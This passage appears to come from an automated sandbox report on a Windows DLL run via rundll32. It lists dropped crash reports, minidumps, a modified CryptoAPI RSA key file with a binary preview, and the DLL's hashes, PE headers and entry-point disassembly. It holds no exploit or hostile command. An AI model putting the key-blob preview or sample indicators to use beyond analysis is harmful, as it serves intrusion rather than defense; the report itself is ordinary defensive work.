MD5:0B84BEE277813D09A6B3A854C1EFE851
SHA1:F0D067DE3E92B33BDCF13B48033D766EB4ED4EF7
SHA-256:B1C4F5A999E69082FDEDC89C22A72557209B4ADD1EDB306BAB2E6E466DC0CAAA
SHA-512:C899623618CF3FB1FE6E33C8358B92A3142A0778894153C9C74E718CB101224DB347ADAA7FC82FBA4EF19F62DAE75C401F01D85FB3CFBBA2AD80C97F45E5D8B8
Malicious:false
Reputation:low
Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.2.3.5.8.5.7.3.6.7.0.6.1.2.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.6.2.3.5.8.5.8.0.5.1.4.3.5.2.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.e.4.c.6.c.f.f.-.6.3.d.3.-.4.8.0.e.-.b.1.a.1.-.1.4.2.3.c.d.b.5.5.a.7.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.a.9.7.9.9.9.c.-.c.4.f.b.-.4.4.d.f.-.9.0.6.9.-.d.e.f.9.0.1.e.f.3.a.a.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.7.8.-.0.0.0.1.-.0.0.1.b.-.7.4.6.3.-.7.c.d.2.7.2.2.c.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_rundll32.exe_8c89162c89cd9acf4ef916dd41e49245a3ef8e_c5a4189a_198fc070\Report.wer
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:dropped
Size (bytes):13614
Entropy (8bit):3.762288872168681
Encrypted:false
SSDEEP:192:D/is0oX1NHBUZMXMed+V38RR/u7sPS274ItWcC:7iqXHBUZMXMe3R/u7sPX4ItWcC
MD5:E987F6574AD074D425A4912D15A41936
SHA1:42EB0D593F3F2E5772BFBC5CD7C335E8EDD029C2
SHA-256:6C50E9A4160803C2B1AF302A5DC9D4541B2DFEDBE2D1527280560A624B94E812
SHA-512:ABAE516DF7D04831EA7A4AA5BE704D02241332A3E2333795CA44C29E14E76B1CF55F2CA6A59A9E2EF62901CCBFF76FEE5F5753B123B329B9DF9C4605E010D908
Malicious:false
Reputation:low
Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.2.3.5.8.5.7.0.0.7.6.8.7.5.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.6.2.3.5.8.5.7.6.6.7.0.6.0.2.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.d.0.8.f.1.7.2.-.1.a.7.0.-.4.c.4.c.-.a.7.2.b.-.a.4.3.e.5.0.9.2.c.8.e.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.5.4.2.5.8.e.2.-.8.2.b.7.-.4.3.7.5.-.9.4.d.0.-.b.6.a.e.2.8.c.c.a.d.3.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.d.0.-.0.0.0.1.-.0.0.1.b.-.e.5.c.f.-.7.f.d.0.7.2.2.c.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_rundll32.exe_8c89162c89cd9acf4ef916dd41e49245a3ef8e_c5a4189a_199fc1e7\Report.wer
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:dropped
Size (bytes):13642
Entropy (8bit):3.7621209734748455
Encrypted:false
SSDEEP:192:Sb/if0oXUNHBUZMXMed+V38RR/u7sPS274ItWcc:O/ihX0BUZMXMe3R/u7sPX4ItWcc
MD5:43BAB30A12B9C79425777ED1B6EA1D8E
SHA1:59B5BE82616F50DC63A7F600E6ACA6AD11057F52
SHA-256:BA1CC68C780845B86EB9C8F44D611583244F4E75D27B571A46B4E4105607C236
SHA-512:9643D50D606B4BA93330BE5DE028A4D52E5AD4BF7EABBFCDCA094EB07459CCB2422BF51D4FD52C00B285B36E217576C46CC8FA9C89FAE1A4DCFA1B14B41CCC8A
Malicious:false
Reputation:low
Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.2.3.5.8.5.7.0.0.4.5.6.2.1.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.6.2.3.5.8.5.7.6.4.3.6.2.2.8.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.8.4.0.3.4.8.b.-.3.3.e.9.-.4.f.d.7.-.9.8.5.1.-.f.e.4.c.b.6.7.3.1.3.9.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.8.e.6.5.c.d.6.-.7.e.4.5.-.4.f.8.3.-.b.e.0.6.-.b.c.1.d.0.e.8.5.c.1.6.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.d.c.-.0.0.0.1.-.0.0.1.b.-.9.5.f.5.-.8.3.d.0.7.2.2.c.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.
C:\ProgramData\Microsoft\Windows\WER\Temp\WERA0B3.tmp.dmp
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Mini DuMP crash report, 14 streams, Thu Apr 8 12:29:31 2021, 0x1205a4 type
Category:dropped
Size (bytes):69362
Entropy (8bit):2.0838765716463046
Encrypted:false
SSDEEP:192:WzxBx/JhX37iYllk1UeZzPcp2OI65rAAT0j5m+KO1kDZ40co8NhMXtgpZKh6UsPA:Yn7Nocp2h658AI1KZ4eO2gZKqZdLs
MD5:11BABEB8443873140C5FFFD59A4859A0
SHA1:F145EF81A373D81BB420F53E173C0488682F3C10
SHA-256:7BD214E29D65814A7247A97E5C0CA7995F81985AEAF0C4D89E18145BA252F7B9
SHA-512:4719E68EE4FAFE8521B0223C6C831D48444F949962EB50C2174E22E50076589AC0EA0884889D1F3582FA3EACAE236B947D0FC419D85A2A1FA9C36EF3B1E60A7A
Malicious:false
Reputation:low
Preview: MDMP....... .......+.n`...................U...........B.......%......GenuineIntelW...........T...........&.n`.............................0..1...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
C:\ProgramData\Microsoft\Windows\WER\Temp\WERA0D2.tmp.dmp
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Mini DuMP crash report, 14 streams, Thu Apr 8 12:29:32 2021, 0x1205a4 type
Category:dropped
Size (bytes):76724
Entropy (8bit):1.98536722039344
Encrypted:false
SSDEEP:384:vLrhLY4R/gX6vqy3Ze1EG3CjKhQ51zrJZtzT:vLO6vqy34263qzVb
MD5:26314EB10423593B8775470283F25386
SHA1:721A02C21AC42C9589F49216A79CAD9E28E66116
SHA-256:6D0C9A5A5EC79D125846A560D2DE9407CCA05F3C430C4CA5C5384ED3C90DDD32
SHA-512:275A3540E55CAA38DA6CE0F81B922759A39F20F1D6EB765F9650F341CAF01435091D65B200DD215C7D5E157226F7A74761B355AAEA9A5C9B30567B566C85EA86
Malicious:false
Reputation:low
Preview: MDMP....... .......,.n`...................U...........B......H%......GenuineIntelW...........T...........&.n`.............................0..1...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
C:\ProgramData\Microsoft\Windows\WER\Temp\WERA8E1.tmp.WERInternalMetadata.xml
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:dropped
Size (bytes):8292
Entropy (8bit):3.7002327632724343
Encrypted:false
SSDEEP:192:Rrl7r3GLNiCg6ieNH7H6Y1+6rgmfTlS1+prB89bWOsffSm:RrlsNil6LN76Ys6rgmfTlSPWNfr
MD5:5E603E5F60061153C133783DEE237FEF
SHA1:B2EFC05FA8A53317C95A808E2E480A6866669C48
SHA-256:6E2021C4CF13AF2EF78FFE9C7426F0F1CEE5AB05E42844E02B2EBB94F26E8829
SHA-512:6EE8558CA2059B3F1B82A8A1849724815492744FE7927A29C1C327CEFAC16191DB6DF591E86124262BDC691E74FACBAC06CD48D7D3435AA54FA467AF3E608B4A
Malicious:false
Reputation:low
Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.3.2.<./.P.i.d.>.......
C:\ProgramData\Microsoft\Windows\WER\Temp\WERA99D.tmp.WERInternalMetadata.xml
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:dropped
Size (bytes):8282
Entropy (8bit):3.6968782999776884
Encrypted:false
SSDEEP:192:Rrl7r3GLNiBe6rbx7c6Ytt6cgmfTlS1+pr389bWqsfxSm:RrlsNiY6rbG6YH6cgmfTlSJWJfl
MD5:133C6D7239DB97584D2608100DD48BA8
SHA1:0F541A791FEC9F1CADE7871FADE60B8F46346E3D
SHA-256:577B2BCB43894D70D6865D60F493F4996C432997BF771C77E36719435D56B32B
SHA-512:C70B6650AA0E4D69FCB95E4DB3921C24D3DAF3F87B0B415A2D7966266F0E20B8F2021DF7223D04A0A4BACF8E12E2B1D37065C7B987D34C28A2C334488070B759
Malicious:false
Reputation:low
Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.2.0.<./.P.i.d.>.......
C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB05.tmp.xml
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4669
Entropy (8bit):4.500901840326026
Encrypted:false
SSDEEP:48:cvIwSD8zssJgtWI9eUVWSC8Bid18fm8M4JCdejZFh+q8/oz/4SrSmd:uITfqVRSNAIJ7dD/DWmd
MD5:74F53426B5EC09FC00D74426B021F886
SHA1:2B2DA45D18F928584DC7CB8302B217A04950A8A3
SHA-256:DF16B82786D1296D0955D2F0E66FEBB85F56CDF6896E4415049C917EEFEC43FB
SHA-512:C3445A3F65D33A682DB1DEE3E2108BD964479F80A405FECBEB0E89B5A87A6746AC999A6625B2F95D0161976ED2B0651E8D465E319D884A2CDE0E0658A305DCB2
Malicious:false
Reputation:low
Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="937300" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
C:\ProgramData\Microsoft\Windows\WER\Temp\WERABF0.tmp.xml
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4669
Entropy (8bit):4.500862773852269
Encrypted:false
SSDEEP:48:cvIwSD8zssJgtWI9eUVWSC8Biq8fm8M4JCdejZFb+q8/ozC4SrSnd:uITfqVRSNAfJ7XDCDWnd
MD5:D6630F9DC50064A95F0799E624D27429
SHA1:3CB30D4DB5B8AC85F23785EF9FD901B94D9E657F
SHA-256:60C2843A40CC04E9545C7A5DB5E5EF33A4E131809ABF0DE46175C986949D4B11
SHA-512:69AFBA39CE60A2C9DFF034D4919F64C16B766F92E924F76FE4184BF2F47B1A6D4A187EA4869A686D8C8185FB1A5941636523C47830F36F8A785BD649EFE86978
Malicious:false
Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="937300" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
C:\ProgramData\Microsoft\Windows\WER\Temp\WERAEDC.tmp.dmp
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Mini DuMP crash report, 14 streams, Thu Apr 8 12:29:36 2021, 0x1205a4 type
Category:dropped
Size (bytes):72414
Entropy (8bit):1.9780823290006586
Encrypted:false
SSDEEP:384:cYkYU7AFXrbp831KZoeOqAvKM5vOyN9jI:cYkYOAp92IZbAtmyr0
MD5:A51999AF613CCA8FA575C3F29CE4D9E1
SHA1:CCB0BE5B8844232810D5CA7426484BADC6661526
SHA-256:E59AC12A44C48D3345B1951992A4A7ED17DDC201A041E4EF980A6A3907B99976
SHA-512:98BAFBC9718DD9CF1F3C5A7768303FC780B5B5BEB2434E3465ECDA94592EC140F5C0CF31A492E3A37F8DBE8E1C972063F34F3B82658EC10781252726799F3FFB
Malicious:false
Preview: MDMP....... .......0.n`...................U...........B.......%......GenuineIntelW...........T.......x...).n`.............................0..1...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB99B.tmp.WERInternalMetadata.xml
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:dropped
Size (bytes):8284
Entropy (8bit):3.697156374563282
Encrypted:false
SSDEEP:192:Rrl7r3GLNiwQ69NH7x6YtQc6cgmfTlS1+prY89bybsfKGm:RrlsNi369N96YOc6cgmfTlSkygfC
MD5:7A9B32A1B8C07143AD1744B6C10C62F1
SHA1:50BD285C3D7ECE7975E8A2747F01991C0FFA40CE
SHA-256:7179B2B7E5D28F9983BC5709FB89D2101195A696AB4ACB54A5D4E6B27B526E1A
SHA-512:A9A63DC4ED097581CB8F8A2C08EBFE7066FDF4DA5E9F2C8E29F090999A3F473C7EBF261550A83DDA3F7349989AD8321B07890376199DCF324FFB35282F7B58C4
Malicious:false
Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.7.5.2.<./.P.i.d.>.......
C:\ProgramData\Microsoft\Windows\WER\Temp\WERBC5B.tmp.xml
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4669
Entropy (8bit):4.500815625173022
Encrypted:false
SSDEEP:48:cvIwSD8zssJgtWI9eUVWSC8Biz8fm8M4JCdejZF6v+q8/ozSA4SrS9d:uITfqVRSNAQJ7YDlDW9d
MD5:72F72E6CF14F55E38E2822BF6843E620
SHA1:B9CE2A3CE2A734C6A459C7B9568E3767D5DFEAA0
SHA-256:876985750B219F0CFE399B64CAF5BCD01773A4081DEE6FED5461DFEB3FDAD174
SHA-512:3B2ED66AC27D4C9B03F2E914DB3B3907906B2FC2BA5E26E9B0DFD6CDC1EEEBB40DEA29BFC69A831C10CBD62FFB9B76ED2A4135F75AAD99B8E042A0FA90933880
Malicious:false
Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="937300" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\bc49718863ee53e026d805ec372039e9_d06ed635-68f6-4e9a-955c-4899f5f57b9a
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:data
Category:modified
Size (bytes):2132
Entropy (8bit):7.078049608180308
Encrypted:false
SSDEEP:48:Jb6UE0wURPA+UCxdKEAIJVpfb6UE6Kzp7LHfv0QhGM2dWEaNAO0:Jb6k5PA+UCJVpfb6RN//vVGMW2z0
MD5:E80D7177BA4A73162E8068C469E4D40D
SHA1:C160660F8B829ABCE22E986E947FA3CD3C87070F
SHA-256:09E0C102612AE962EC78E8656ABAAF16A27886BBE9C76FCEADC6766F24251EDE
SHA-512:E12CE12D5BBF82F36F6D45776B69212AFB092B8E36F0750813A2FFA46DBA419D872A370A6579D1DEC8C886966B91A59408001676430253F16D08B337011AA820
Malicious:false
Preview: ....................\...................user.....................RSA1H.......?...........}...h8...B~k..!.R..<.HN:D...tW....5g.n.xLu5..tI. .q5e.. ........................z..O.........\p.O...P........,...C.r.y.p.t.o.A.P.I. .P.r.i.v.a.t.e. .K.e.y....f...... .....)...Q,w*..C......n"...4.>............. ....y...Z ..2..q.F."y3X..K....H.....@....~...?.5....T.....E....a...r.|..!.J2.....&.....>.....#.L=.).Lk{.z.R..%.`.%..Z...E. 6h<f..~&.u0..jgD.L.w..5X.U.....;.k.1.^..vP...!.......v..k....2.FIv#..X~.......D...t..>.........EYUB.rf...V5.fw...sM..=RmJ}....../...O.,_~.?./.fe.....V..Z.2...Z....-q..S-wl.f...x..Ax........O..\>.r.....F1.....<..S..{e`...k_9....h.....I..!......X..p.P....."n..\e....`a..9....;zW.<g.3b[u...!@.....z......Y...i.%{_..g.......G...n....w..[.qn.&+.Tg.-.................z..O.........\p.O...P............E.x.p.o.r.t. .F.l.a.g....f...... ...d..;.Z.C..Q.z...........Y.T..c............. ....)...-"....?}.b.".......h..H......\*.B..:.M..... @.

Static File Info

General

File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):5.690395065467963
TrID:
  • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
  • Generic Win/DOS Executable (2004/3) 0.20%
  • DOS Executable Generic (2002/1) 0.20%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:4123.dll
File size:49152
MD5:f776deb4df137b37dcae5406c8f3a07a
SHA1:f6a31b594fca39c118927405fa4d14353b8fd49a
SHA256:93cc5e6a6b671d9b0124ade32ae8b09269de9f03c5c5e66347fbfc7a8c3b305e
SHA512:4077b4214b4683bb4776d470027e61fcc3cb3e78beb9377674e4a4de9115d52911e39cb29a566ab446c6962a252ce01020ffd616b5854a9d8230414262bfafe2
SSDEEP:768:fw2jnhaqqUgQeONXr27iLAkfP69FyfQZWBS:hjnEQeON727CA2G
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[E...$...$...$...8...$...;...$..};...$...$..L$...;...$..."...$...;...$..Rich.$..........................PE..L.....b`...........

File Icon

Icon Hash:7575757575759ab2

Static PE Info

General

Entrypoint:0x10001aa1
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x10000000
Subsystem:windows gui
Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
DLL Characteristics:
Time Stamp:0x60620D8C [Mon Mar 29 17:25:32 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:17bfed211106b3e7d0f15493e6716264

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push ebx
mov ebx, dword ptr [ebp+08h]
push esi
mov esi, dword ptr [ebp+0Ch]
push edi
mov edi, dword ptr [ebp+10h]
test esi, esi
jne 00007FDD60AAC09Bh
cmp dword ptr [1000378Ch], 00000000h
jmp 00007FDD60AAC0B8h
cmp esi, 01h
je 00007FDD60AAC097h
cmp esi, 02h
jne 00007FDD60AAC0B4h
mov eax, dword ptr [10003794h]
test eax, eax
je 00007FDD60AAC09Bh
